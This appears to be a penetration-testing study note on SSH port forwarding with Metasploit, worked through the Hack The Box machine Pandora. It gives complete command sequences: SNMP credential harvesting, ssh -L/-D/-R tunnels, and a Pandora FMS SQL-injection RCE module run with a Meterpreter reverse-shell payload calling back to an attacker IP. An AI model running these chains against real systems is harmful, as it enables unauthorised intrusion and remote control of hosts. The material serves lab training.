ssh-portfwding-with-metasploit.md (11845B)
1 --- 2 title: "SSH Portfwding with metasploit" 3 description: "Your original guide is mostly correct for local port forwarding (ssh -L), but it lacks clarity on why things work and when to use different approaches…" 4 category: tunneling-pivoting 5 tags: ["tunneling-pivoting", "tunneling"] 6 tools: ["Metasploit", "Meterpreter"] 7 difficulty: intermediate 8 updated: "2026-08-10" 9 source: "vault:Misc/SSH Portfwding with metasploit .md" 10 --- 11 # SSH Tunneling with Metasploit: A Complete Guide (Pandora HTB Edition) 12 13 Your original guide is **mostly correct** for local port forwarding (`ssh -L`), but it lacks clarity on *why* things work and when to use different approaches. Let me clarify the confusion and expand with the Pandora HTB box as a practical example. 14 15 --- 16 17 ## Understanding the Pandora HTB Scenario 18 19 **The Problem:** 20 * Pandora HTB has a **Pandora FMS web application** running on `127.0.0.1:80` (localhost only) 21 * It's bound ONLY to loopback—you **cannot** access it from your attacker machine directly 22 * You gain SSH access as `daniel` user via SNMP credential leak 23 * You need to access this internal web service to exploit it 24 25 **The Solution:** SSH local port forwarding 26 27 --- 28 29 ## Part 1: SSH Local Port Forward (`ssh -L`) - The Pandora Way 30 31 ### What It Actually Does 32 33 ```bash 34 ssh -L 9001:localhost:80 daniel@10.10.11.136 35 ``` 36 37 **This creates a PORT MAPPING:** 38 * Your machine listens on `127.0.0.1:9001` 39 * Any connection to YOUR `127.0.0.1:9001` → tunneled through SSH → TARGET's `localhost:80` 40 41 **Critical Understanding:** 42 * The `localhost:80` part is resolved **from the target's perspective** 43 * You could also forward to OTHER machines the target can reach: `ssh -L 9001:10.10.10.5:80 daniel@target` 44 45 ### Verify the Tunnel 46 47 From **your machine**: 48 49 ```bash 50 curl -i http://127.0.0.1:9001/pandora_console/ 51 # Or in browser: http://127.0.0.1:9001/pandora_console/ 52 ``` 53 54 If you see the Pandora FMS login page, the tunnel works. 55 56 --- 57 58 ## Part 2: Metasploit Configuration with `ssh -L` 59 60 ### Core Principle: You're Targeting YOUR Local Endpoint 61 62 When using `ssh -L`, Metasploit connects to **your local tunnel endpoint**, NOT the remote IP. 63 64 ### Configuration for Pandora FMS Exploit 65 66 ```bash 67 msfconsole 68 use exploit/linux/http/pandora_fms_sqli_rce 69 show options 70 ``` 71 72 **Set these options:** 73 74 | Option | Value | Why | 75 |--------|-------|-----| 76 | `RHOSTS` | `127.0.0.1` | The tunnel endpoint is on YOUR localhost | 77 | `RPORT` | `9001` | YOUR local listening port (not 80!) | 78 | `SSL` | `false` | Port 80 is HTTP, not HTTPS | 79 | `TARGETURI` | `/pandora_console/` | Application base path | 80 | `USERNAME` | `admin` | Default or discovered credentials | 81 | `PASSWORD` | `pandora` | Default or discovered credentials | 82 | `Proxies` | **UNSET** | `ssh -L` is NOT a proxy | 83 84 **Commands:** 85 86 ```bash 87 set RHOSTS 127.0.0.1 88 set RPORT 9001 89 set SSL false 90 set TARGETURI /pandora_console/ 91 set USERNAME admin 92 set PASSWORD pandora 93 unset Proxies 94 ``` 95 96 --- 97 98 ## Part 3: The Critical LHOST Confusion (Reverse Shells) 99 100 ### The Two Separate Connections 101 102 When you exploit a service, there are **TWO different network connections**: 103 104 1. **Exploit Delivery** (Metasploit → Web Service): 105 * Goes through the tunnel 106 * RHOSTS=127.0.0.1, RPORT=9001 107 108 2. **Reverse Shell** (Target → Attacker): 109 * Does NOT go through the tunnel (usually) 110 * LHOST=your_real_IP (e.g., tun0 10.10.14.x) 111 112 ### LHOST Settings for Pandora HTB 113 114 ```bash 115 set LHOST 10.10.14.50 # Your tun0 VPN IP 116 set LPORT 4444 # Port where YOU listen for callback 117 ``` 118 119 **Why NOT `127.0.0.1`?** 120 * If LHOST=127.0.0.1, you're telling the target to connect to **its own** localhost 121 * The reverse shell would try to connect to itself and fail 122 123 **Why does this work without another tunnel?** 124 * The target **can reach** your VPN IP directly (10.10.14.x) 125 * Only the *web service* is localhost-only 126 * The target machine itself has normal network connectivity 127 128 ### Complete Exploit Command 129 130 ```bash 131 use exploit/linux/http/pandora_fms_sqli_rce 132 set RHOSTS 127.0.0.1 # Tunnel endpoint on YOUR machine 133 set RPORT 9001 # YOUR local port 134 set SSL false 135 set TARGETURI /pandora_console/ 136 set USERNAME admin 137 set PASSWORD pandora 138 set LHOST 10.10.14.50 # YOUR tun0 IP (for reverse shell) 139 set LPORT 4444 140 set PAYLOAD linux/x64/meterpreter/reverse_tcp 141 exploit 142 ``` 143 144 --- 145 146 ## Part 4: When to Use `ssh -D` (Dynamic SOCKS Proxy) 147 148 ### The Difference 149 150 `ssh -D` is **completely different** from `ssh -L`: 151 152 | Feature | `ssh -L` (Local Forward) | `ssh -D` (SOCKS Proxy) | 153 |---------|-------------------------|------------------------| 154 | Type | Direct port mapping | Application-level proxy | 155 | Targets | ONE specific host:port | ANY host:port through proxy | 156 | Setup | One tunnel per port | One proxy for everything | 157 | Metasploit Config | RHOSTS=127.0.0.1, no Proxies | RHOSTS=actual_target, set Proxies | 158 159 ### Creating a SOCKS Proxy 160 161 ```bash 162 ssh -D 1080 daniel@10.10.11.136 163 ``` 164 165 This creates a **SOCKS5 proxy** on YOUR `127.0.0.1:1080`. 166 167 ### Metasploit Configuration with SOCKS Proxy 168 169 **Key difference:** You now target the **actual remote host**, not 127.0.0.1: 170 171 ```bash 172 setg Proxies socks5:127.0.0.1:1080 173 set RHOSTS 10.10.11.136 # Actual target IP 174 set RPORT 80 # Actual remote port 175 set SSL false 176 ``` 177 178 **What happens:** 179 1. Metasploit connects to the SOCKS proxy at 127.0.0.1:1080 180 2. Proxy forwards the connection through SSH to 10.10.11.136:80 181 3. The target's localhost services are still unreachable (SOCKS doesn't help here) 182 183 ### When to Use SOCKS (`ssh -D`) 184 185 * **Multiple targets/ports** behind the SSH server 186 * Scanning entire internal networks 187 * Dynamic reconnaissance 188 * When you don't know which ports you'll need in advance 189 190 For Pandora HTB specifically, **`ssh -L` is simpler** because you only need one specific port. 191 192 --- 193 194 ## Part 5: Advanced Scenario - `ssh -R` (Reverse Tunnel) 195 196 ### When Target Cannot Reach You 197 198 Sometimes the target **cannot** connect back to your IP: 199 * Double NAT 200 * Firewall blocking outbound 201 * No route to your network 202 203 **Solution:** Reverse port forward 204 205 ### How `ssh -R` Works 206 207 ```bash 208 # On your machine, create reverse tunnel: 209 ssh -R 4444:localhost:4444 daniel@10.10.11.136 210 211 # In another terminal, start local listener: 212 nc -lvnp 4444 213 ``` 214 215 **What this does:** 216 * Target's `localhost:4444` → tunneled back through SSH → YOUR `localhost:4444` 217 * When target connects to its own localhost:4444, it reaches your listener 218 219 ### Metasploit with Reverse Tunnel 220 221 ```bash 222 # Terminal 1: Start handler on your machine 223 msfconsole 224 use multi/handler 225 set PAYLOAD linux/x64/shell/reverse_tcp 226 set LHOST 127.0.0.1 # Listen locally 227 set LPORT 4444 228 run 229 230 # Terminal 2: Create reverse tunnel and exploit 231 ssh -R 4444:localhost:4444 daniel@10.10.11.136 232 233 # Terminal 3: Run exploit with tunnel settings 234 msfconsole 235 use exploit/linux/http/pandora_fms_sqli_rce 236 set RHOSTS 127.0.0.1 # Web service tunnel 237 set RPORT 9001 238 set LHOST 127.0.0.1 # Target connects to its localhost 239 set LPORT 4444 # Which forwards to you via ssh -R 240 set PAYLOAD linux/x64/shell/reverse_tcp 241 exploit 242 ``` 243 244 --- 245 246 ## Part 6: Complete Pandora HTB Workflow 247 248 ### Step 1: Reconnaissance 249 250 ```bash 251 # Enumerate SNMP (finds daniel's credentials) 252 snmpwalk -v 2c -c public 10.10.11.136 253 ``` 254 255 ### Step 2: SSH Access 256 257 ```bash 258 ssh daniel@10.10.11.136 259 # Password discovered via SNMP 260 ``` 261 262 ### Step 3: Port Forward (keep this running) 263 264 ```bash 265 ssh -L 9001:localhost:80 daniel@10.10.11.136 -N 266 # -N means "don't execute commands, just forward" 267 ``` 268 269 ### Step 4: Verify Access 270 271 ```bash 272 curl http://127.0.0.1:9001/pandora_console/ 273 ``` 274 275 ### Step 5: Exploit with Metasploit 276 277 ```bash 278 msfconsole -q 279 use exploit/linux/http/pandora_fms_sqli_rce 280 281 # Access the web service via tunnel 282 set RHOSTS 127.0.0.1 283 set RPORT 9001 284 set SSL false 285 set TARGETURI /pandora_console/ 286 287 # Credentials (default or discovered) 288 set USERNAME admin 289 set PASSWORD pandora 290 291 # Reverse shell comes back directly (not through tunnel) 292 set LHOST 10.10.14.50 # Your tun0 IP 293 set LPORT 4444 294 295 # Payload 296 set PAYLOAD linux/x64/meterpreter/reverse_tcp 297 298 # No proxy needed for ssh -L 299 unset Proxies 300 301 show options 302 check 303 exploit 304 ``` 305 306 --- 307 308 ## Part 7: Common Mistakes & Fixes 309 310 ### ❌ Mistake 1: Setting RHOSTS to Target IP 311 312 ```bash 313 set RHOSTS 10.10.11.136 # WRONG with ssh -L 314 set RPORT 80 315 ``` 316 317 **Why it fails:** You're bypassing the tunnel and trying to connect directly (which is blocked). 318 319 **Fix:** 320 ```bash 321 set RHOSTS 127.0.0.1 # Your local tunnel endpoint 322 set RPORT 9001 # Your local port 323 ``` 324 325 --- 326 327 ### ❌ Mistake 2: Setting LHOST to 127.0.0.1 328 329 ```bash 330 set LHOST 127.0.0.1 # WRONG for standard reverse shell 331 ``` 332 333 **Why it fails:** Target tries to connect to its own localhost, not you. 334 335 **Fix:** 336 ```bash 337 set LHOST 10.10.14.50 # Your tun0 IP that target can reach 338 ``` 339 340 --- 341 342 ### ❌ Mistake 3: Using Proxies with `ssh -L` 343 344 ```bash 345 set Proxies socks5:127.0.0.1:1080 # WRONG with ssh -L 346 ``` 347 348 **Why it's wrong:** `ssh -L` is not a proxy, it's a direct port mapping. 349 350 **Fix:** 351 ```bash 352 unset Proxies 353 unsetg Proxies 354 ``` 355 356 --- 357 358 ### ❌ Mistake 4: Wrong SSL Setting 359 360 ```bash 361 set SSL true # WRONG when forwarding HTTP port 80 362 ``` 363 364 **Why it fails:** Metasploit tries HTTPS but port 80 speaks HTTP. 365 366 **Fix:** 367 ```bash 368 set SSL false # Match the actual protocol 369 ``` 370 371 --- 372 373 ## Part 8: Decision Tree 374 375 ### Which Tunneling Method? 376 377 ``` 378 Need to access localhost-only service? 379 │ 380 ├─ YES: Need ONE specific port? 381 │ └─ Use: ssh -L 9001:localhost:80 user@target 382 │ └─ Metasploit: RHOSTS=127.0.0.1, RPORT=9001, unset Proxies 383 │ 384 ├─ YES: Need MULTIPLE ports/hosts? 385 │ └─ Use: ssh -D 1080 user@target 386 │ └─ Metasploit: setg Proxies socks5:127.0.0.1:1080, RHOSTS=actual_IP 387 │ 388 └─ NO: Direct access works 389 └─ Just set RHOSTS=target_IP normally 390 ``` 391 392 ### Can Target Reach You for Reverse Shell? 393 394 ``` 395 Target can connect to your IP? 396 │ 397 ├─ YES (normal case): 398 │ └─ LHOST=your_tun0_IP (e.g., 10.10.14.50) 399 │ 400 ├─ NO (firewall/NAT blocks): 401 │ └─ Use: ssh -R 4444:localhost:4444 user@target 402 │ └─ LHOST=127.0.0.1 (target's localhost forwards to you) 403 │ 404 └─ UNSURE: 405 └─ Try: python3 -m http.server 8000 406 └─ On target: curl http://your_IP:8000 407 └─ If works: use your_IP, if fails: use ssh -R 408 ``` 409 410 --- 411 412 ## Part 9: Auxiliary/Scanner Modules (No LHOST Needed) 413 414 For modules that just **query** the service (no reverse shell): 415 416 ```bash 417 use auxiliary/scanner/http/http_version 418 set RHOSTS 127.0.0.1 419 set RPORT 9001 420 set SSL false 421 unset Proxies 422 run 423 ``` 424 425 **Notice:** No LHOST/LPORT because there's no reverse connection. 426 427 --- 428 429 ## Summary Table: Metasploit Settings by Tunnel Type 430 431 | Tunnel Type | RHOSTS | RPORT | Proxies | LHOST (if reverse shell) | 432 |-------------|--------|-------|---------|--------------------------| 433 | `ssh -L 9001:localhost:80` | `127.0.0.1` | `9001` | **unset** | Your real IP (10.10.14.x) | 434 | `ssh -D 1080` | Actual target IP | Actual port | `socks5:127.0.0.1:1080` | Your real IP (10.10.14.x) | 435 | `ssh -R 4444:localhost:4444` | `127.0.0.1` (for web) | `9001` (for web) | **unset** | `127.0.0.1` (target's localhost) | 436 | No tunnel | Actual target IP | Actual port | **unset** | Your real IP (10.10.14.x) | 437 438 --- 439 440 ## What Your Original Guide Got Right 441 442 * ✅ RHOSTS=127.0.0.1 for `ssh -L` 443 * ✅ RPORT=local_listening_port for `ssh -L` 444 * ✅ Unset Proxies for `ssh -L` 445 * ✅ LHOST/LPORT mostly not needed for scanner modules 446 447 ## What It Missed 448 449 * ❌ **WHY** RHOSTS is 127.0.0.1 (it's YOUR local endpoint) 450 * ❌ LHOST for reverse shells (needs your real IP) 451 * ❌ When to use `ssh -D` vs `ssh -L` 452 * ❌ `ssh -R` for when target can't reach you 453 * ❌ The distinction between "accessing service" and "receiving reverse shell" 454 455 --- 456 457 This guide should clear up the confusion. The Pandora HTB example is perfect for understanding these concepts because it demonstrates the exact scenario where `ssh -L` shines.